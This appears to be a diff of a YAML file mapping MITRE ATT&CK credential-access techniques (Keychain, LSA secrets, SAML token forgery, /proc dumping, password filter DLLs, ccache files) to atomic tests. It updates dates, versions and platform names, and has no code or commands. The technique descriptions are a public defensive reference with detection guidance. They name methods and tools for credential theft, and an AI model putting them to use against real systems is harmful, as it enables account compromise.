+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests: []
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -44027,8 +44681,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -44045,11 +44699,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -44067,7 +44720,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -44084,10 +44737,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -44111,46 +44764,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -44171,65 +44790,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -44238,6 +44854,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44245,31 +44864,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -44282,14 +44933,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -44330,14 +44981,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -44400,81 +45048,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -44559,12 +45205,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44613,38 +45258,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -44668,76 +45288,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
